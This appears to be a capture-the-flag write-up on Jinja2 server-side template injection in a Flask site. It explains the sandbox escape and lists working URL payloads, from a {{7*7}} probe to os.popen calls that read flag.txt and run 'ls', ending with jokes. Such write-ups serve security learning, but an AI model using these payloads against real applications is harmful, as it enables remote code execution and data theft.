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  • Flask / Jinja2 Website


First of all, in a Jinja injection you need to find a way to escape from the sandbox and recover access the regular python execution flow. To do so, you need to abuse objects that are from the non-sandboxed environment but are accessible from the sandbox.

Then, from these objects we need to get to the class: `` in order to try to recover defined classes. This is because from this object we can call the __subclasses__ method and access all the classes from the non-sandboxed python env.

In order to access that object class, you need to access a class object and then access either __base__, __mro__()[-1] or .mro()[-1]. And then, after reaching this object class we call __subclasses__().

Having recovered `` and called __subclasses__ we can now use those classes to read and write files and exec code.

The call to __subclasses__ has given us the opportunity to access hundreds of new functions, we will be happy just by accessing the file class to read/write files or any class with access to a class that allows to execute commands (like os).

PoC - Proof of Concept

  1. Enter to the url hxxp[://]159[.]65[.]48[.]156:30989/ following {{ 7*7 }}.
<code class="language-bash">hxxp[://]159[.]65[.]48[.]156:30989/{{ 7*7 }}
  1. If the site shows you 49 this is an indicator that SSTI - Server Side Injection Template is available.

Here is the Fun Part

  1. Check if one of the variables can be dumped.
<code class="language-bash">dict

URL Payloads

<code class="language-bash">hxxp[://]159[.]65[.]48[.]156:30989/{{ dict }}
hxxp[://]159[.]65[.]48[.]156:30989/{{ config }}
hxxp[://]159[.]65[.]48[.]156:30989/{{ request }}
  1. If config is available this can be abused to RCE!
  2. Let's exploit!
  3. Enter this payload:

Expected Result

You should get something like this.

Output from the server /

URL Payloads

hxxp[://]159[.]65[.]48[.]156:30989/{{config.__class__.__init__.__globals__['os'].popen('cat flag.txt').read()}}
  1. From here you can now edit your commands, like mine shown above to cat flag.txt

More Payloads

hxxp[://]159[.]65[.]48[.]156:30989/{%for(x)in().__class__.__base__.__subclasses__()%}{%if'war'in(x).__name__ %}{{x()._module.__builtins__['__import__']('os').popen('ls').read()}}{%endif%}{%endfor%}


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Why don't Python programmers like snakes?
Because they have issues with Remote Code Execution!

Why did the Flask app feel insecure about its Jinja2 templates?
Because it heard they're prone to "Execution" without a proper "context"!

Remember, folks, code responsibly and always sanitize your inputs!
